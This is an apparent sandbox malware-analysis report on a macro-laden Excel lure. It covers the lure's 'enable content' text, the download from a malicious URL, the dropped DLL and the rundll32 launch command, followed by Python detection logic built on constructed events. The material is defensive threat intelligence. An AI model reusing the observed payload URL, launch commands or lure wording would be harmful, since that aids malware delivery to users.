
Analysis Report SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665 (renamed file extension from 3665 to xls)
Analysis ID: 383014
MD5: a7c64329efaea29a2dc97ced238490f7
SHA1: 5d4b9b386354444cf74fd858e3409f0294c45330
SHA256: 8ee305eec94aaef24116983ceef933359fb860ab50787b7963c3f46fe751630c

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2556 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2564 cmdline: rundll32 ..\sdbybsd.fds,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2364 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0x12ebb:$e1: Enable Editing
  • 0x12c05:$e3: Enable editing
  • 0x12cd7:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://revolet-sa.com/files/countryyelow.php | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://revolet-sa.com/files/countryyelow.php | Virustotal: Detection: 12%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx | Virustotal: Detection: 21%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls | Virustotal: Detection: 13%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: K:\PrintMyMschartLegends_src\Source Code\PrintMyMschartLegends\Release\PrintMyMschartLegends.pdb | source: sdbybsd.fds.0.dr

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: ySiCz[1].fbx.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll | origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe
Source: global traffic | DNS query: name: revolet-sa.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.232.249.186:80
Source: global traffic | HTTP traffic detected:
  GET /files/countryyelow.php HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: revolet-sa.com
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5826D0B3.emf
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: revolet-sa.com
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2090160678.00000000027C0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2090160678.00000000027C0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number 4 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. :54 Protected View Thi
Source: Screenshot number 4 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start 18 the decryption of the docum
Source: Document image extraction number 2 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet. Protected View This fi
Source: Document image extraction number 2 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number 3 | Screenshot OCR: Enable Content
Source: Document image extraction number 4 | Screenshot OCR: Enable Editing
Source: Document image extraction number 14 | Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. Protected View This fi
Source: Document image extraction number 14 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of the document
Found Excel 4.0 Macro with suspicious formulas
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls | Initial sample: EXEC
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls | Initial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\sdbybsd.fds
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls | OLE indicator, VBA macros: true
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: Joe Sandbox View | Dropped File: C:\Users\user\sdbybsd.fds AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls, type: SAMPLE | Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.expl.evad.winXLS@7/8@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC36D.tmp
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls | OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\rundll32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls | Virustotal: Detection: 13%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\sdbybsd.fds,StartW
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_01ED1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02420E20 push dword ptr [edx+14h]; ret
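The Startup tree and the System Summary evidence give the whole execution chain: EXCEL.EXE writes the same payload twice (both dropped files carry SHA256 AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1) under extensions that are not executable (.fbx in the IE cache, .fds in the user root), then launches it with rundll32 ..\sdbybsd.fds,StartW; the 64-bit rundll32 re-launches the 32-bit one from SysWOW64, which spawns wermgr.exe. rundll32 resolves its module through LoadLibrary, and the loader does not look at the extension, so a .fds file loads like any DLL. The Python below is an added example, not part of the Joe Sandbox report, that turns those three observables into detection logic. The process events and the file header bytes are constructed from the report's command lines and paths; the benign shell32.dll control event and the explorer.exe parent are invented for contrast.

```python
"""Detection logic for the chain in this report (example, constructed data).

Checks three observables against process-creation and file-drop records:
  1. an Office process starting rundll32.exe;
  2. rundll32.exe given a module whose extension is not .dll, or a
     relative module path such as ..\\sdbybsd.fds;
  3. a dropped file whose bytes carry a DOS/PE header while the name
     says otherwise (.fbx, .fds).
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Optional

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Extensions Windows normally uses for PE images; an MZ/PE header under any
# other extension is a content/extension mismatch worth surfacing.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".cpl", ".scr", ".drv"}


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def rundll32_module(command_line: str) -> Optional[str]:
    """Module path handed to rundll32 (text before ',EntryPoint'), or None
    when the command line is not a rundll32 invocation."""
    cmd = command_line.strip()
    if cmd.startswith('"'):                     # quoted image path
        end = cmd.find('"', 1)
        if end < 0:
            return None
        exe, rest = cmd[1:end], cmd[end + 1:]
    else:
        exe, _, rest = cmd.partition(" ")
    if ntpath.basename(exe).lower() not in ("rundll32", "rundll32.exe"):
        return None
    rest = rest.strip()
    if not rest:
        return None
    if rest.startswith('"'):                    # quoted module path
        end = rest.find('"', 1)
        return rest[1:end] if end > 0 else None
    # unquoted: the module ends at the ',' before the entry point or at a space
    return rest.split(",", 1)[0].split()[0]


def flags_for(event: ProcessEvent) -> List[str]:
    """Flags raised by one process-creation event."""
    flags: List[str] = []
    parent = ntpath.basename(event.parent_image).lower()
    image = ntpath.basename(event.image).lower()
    if image == "rundll32.exe":
        if parent in OFFICE_IMAGES:
            flags.append("office_spawns_rundll32")
        module = rundll32_module(event.command_line)
        if module is not None:
            if ntpath.splitext(module)[1].lower() != ".dll":
                flags.append("rundll32_non_dll_module:" + module)
            if not ntpath.isabs(module) and "\\" in module:
                flags.append("rundll32_relative_module_path")
    if image == "wermgr.exe" and parent == "rundll32.exe":
        flags.append("rundll32_spawns_wermgr")
    return flags


def looks_like_pe(head: bytes) -> bool:
    """DOS header whose e_lfanew points at a 'PE\\0\\0' signature inside head."""
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(head[0x3C:0x40], "little")
    return head[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def pe_with_mismatched_extension(path: str, head: bytes) -> bool:
    return looks_like_pe(head) and ntpath.splitext(path)[1].lower() not in PE_EXTENSIONS


def suspicious_drops(drops: Dict[str, bytes]) -> List[str]:
    return [p for p, head in drops.items() if pe_with_mismatched_extension(p, head)]


def analyse(events: List[ProcessEvent], drops: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Run both checks; returns {finding: [evidence, ...]} for everything that fired."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        for flag in flags_for(ev):
            findings.setdefault(flag, []).append(f"pid {ev.pid}: {ev.command_line}")
    for path in suspicious_drops(drops):
        findings.setdefault("pe_with_mismatched_extension", []).append(path)
    return findings


# --- constructed sample data, modelled on the report's process tree ---------
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
RUNDLL_64 = r"C:\Windows\System32\rundll32.exe"
RUNDLL_32 = r"C:\Windows\SysWOW64\rundll32.exe"
EVENTS = [
    ProcessEvent(2300, "", EXCEL, f"'{EXCEL}' /automation -Embedding"),  # parent unknown in report
    ProcessEvent(2556, EXCEL, RUNDLL_64, r"rundll32 ..\sdbybsd.fds,StartW"),
    ProcessEvent(2564, RUNDLL_64, RUNDLL_32, r"rundll32 ..\sdbybsd.fds,StartW"),
    ProcessEvent(2364, RUNDLL_32, r"C:\Windows\System32\wermgr.exe", r"C:\Windows\system32\wermgr.exe"),
    ProcessEvent(4000, r"C:\Windows\explorer.exe", RUNDLL_64, "rundll32.exe shell32.dll,Control_RunDLL"),  # benign control
]
# Minimal PE header: 'MZ', e_lfanew = 0x40, 'PE\0\0' at 0x40 (constructed bytes).
PE_HEAD = b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\x00\x00"
EMF_HEAD = b"\x01\x00\x00\x00" + b"\x00" * 0x40   # EMR_HEADER record type; constructed
DROPS = {
    r"C:\Users\user\sdbybsd.fds": PE_HEAD,
    r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx": PE_HEAD,
    r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5826D0B3.emf": EMF_HEAD,
}

if __name__ == "__main__":
    for finding, evidence in analyse(EVENTS, DROPS).items():
        print(finding)
        for line in evidence:
            print("   ", line)
```

On real telemetry, fill ProcessEvent from process-creation records (parent image, image, command line) and the drops map from file-creation records plus the first 0x44 or more bytes of each new file; the extension check needs nothing beyond that prefix. Both rundll32 flags fire on the 64-bit and the 32-bit launch, so the chain is visible even if only one of the two processes is logged.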

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\sdbybsd.fds
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (27 occurrences)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_01ED1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00340456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_0034095E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_01ED1030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

The matrix is listed here per tactic. The digits attached to a technique name are the match-count badges of the original matrix, reproduced as extracted; techniques without a count are the matrix's default placeholders.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Scripting 11, Native API 1, Exploitation for Client Execution 33, At (Windows), Cron, Launchd
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: Process Injection 11, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: Masquerading 121, Disable or Modify Tools 1, Process Injection 11, Scripting 11, Obfuscated Files or Information 1, Rundll32 1
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery 11, File and Directory Discovery 1, System Information Discovery 3, System Network Configuration Discovery, Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Data from Local System, Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: Ingress Tool Transfer 2, Non-Application Layer Protocol 2, Application Layer Protocol 12, Protocol Impersonation, Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
Impact: Modify System Partition, Device Lockout, Delete Device Data



Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls | 13% | Virustotal |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx | 22% | Virustotal |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx | 5% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx | 2% | ReversingLabs | Win32.Trojan.Trickpak
C:\Users\user\sdbybsd.fds | 5% | Metadefender |
C:\Users\user\sdbybsd.fds | 2% | ReversingLabs | Win32.Trojan.Trickpak

Unpacked PE Files

Source | Detection | Scanner | Label
4.2.rundll32.exe.23b0000.8.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
revolet-sa.com | 4% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://revolet-sa.com/files/countryyelow.php | 13% | Virustotal |
http://revolet-sa.com/files/countryyelow.php | 100% | Avira URL Cloud | malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
revolet-sa.com | 192.232.249.186 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://revolet-sa.com/files/countryyelow.php | true | 13% Virustotal; Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | rundll32.exe, 00000004.00000002.2090160678.00000000027C0000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.icra.org/vocabulary/. | rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | rundll32.exe, 00000004.00000002.2090160678.00000000027C0000.00000002.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | rundll32.exe, 00000003.00000002.2091320743.0000000001D77000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2089129564.0000000001CD7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | false | | high
http://investor.msn.com/ | rundll32.exe, 00000003.00000002.2090922768.0000000001B90000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2088951177.0000000001AF0000.00000002.00000001.sdmp | false | | high

None of these strings is marked malicious and none was requested during the run; they were carved from the rundll32.exe process memory. The only URL actually contacted is http://revolet-sa.com/files/countryyelow.php (Contacted URLs above), which is the network indicator to act on.

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383014
Start date: 07.04.2021
Start time: 05:53:16
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665 (renamed file extension from 3665 to xls)
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.expl.evad.winXLS@7/8@1/1
EGA Information: Failed
HDC Information:
  • Successful, ratio: 8.1% (good quality ratio 5.4%)
  • Quality average: 64.3%
  • Quality standard deviation: 45.9%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe
  • TCP Packets have been reduced to 100
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
05:53:40 | API Interceptor | 8x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match: 192.232.249.186 (associated samples, all detected malicious; context: URL contacted on this IP)
  • SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls: revolet-sa.com/files/countryyelow.php
  • SecuriteInfo.com.Heur.19090.xls: revolet-sa.com/files/countryyelow.php
  • SecuriteInfo.com.Heur.4923.xls: revolet-sa.com/files/countryyelow.php
  • SecuriteInfo.com.Heur.4923.xls: revolet-sa.com/files/countryyelow.php

Domains

Match: revolet-sa.com (associated samples, all detected malicious; context: resolved IP)
  • SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls: 192.232.249.186
  • SecuriteInfo.com.Heur.19090.xls: 192.232.249.186
  • SecuriteInfo.com.Heur.4923.xls: 192.232.249.186
  • SecuriteInfo.com.Heur.4923.xls: 192.232.249.186

ASN

Match: UNIFIEDLAYER-AS-1US (associated samples, all detected malicious; context: contacted IP)
  • SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls: 192.232.249.186
  • SecuriteInfo.com.Heur.19090.xls: 192.232.249.186
  • SALM0BRU.exe: 162.241.148.243
  • Purchase Order.8000.scan.pdf...exe: 162.241.148.243
  • SecuriteInfo.com.Heur.4923.xls: 192.232.249.186
  • SecuriteInfo.com.Heur.4923.xls: 192.232.249.186
  • document-1251000362.xlsm: 192.185.48.186
  • document-1251000362.xlsm: 192.185.48.186
  • catalogue-41.xlsb: 108.167.180.111
  • documents-1660683173.xlsm: 192.185.56.250
  • 06iKnPFk8Y.dll: 162.241.54.59
  • 06iKnPFk8Y.dll: 162.241.54.59
  • ddff.exe: 108.179.235.108
  • PowerShell_Input.ps1: 162.241.61.203
  • New PO#700-20-HDO410444RF217,pdf.exe: 192.185.122.118
  • Purchase Order.9000.scan.pdf...exe: 162.241.148.243
  • document-1848152474.xlsm: 192.185.48.186
  • 7z7Q51Y8Xd.dll: 162.241.54.59
  • pySsaGoiCT.dll: 162.241.54.59
  • QOpv1PykFc.dll: 162.241.54.59

                JA3 Fingerprints

                No context

                Dropped Files

                Match: C:\Users\user\sdbybsd.fds
                Associated Sample Name / URL | Detection
                SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls | malicious
                SecuriteInfo.com.Heur.19090.xls | malicious
                SecuriteInfo.com.Heur.4923.xls | malicious
                SecuriteInfo.com.Heur.4923.xls | malicious
                Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx
                Associated Sample Name / URL | Detection
                SecuriteInfo.com.Trojan.Agent.FFFK.23764.xls | malicious
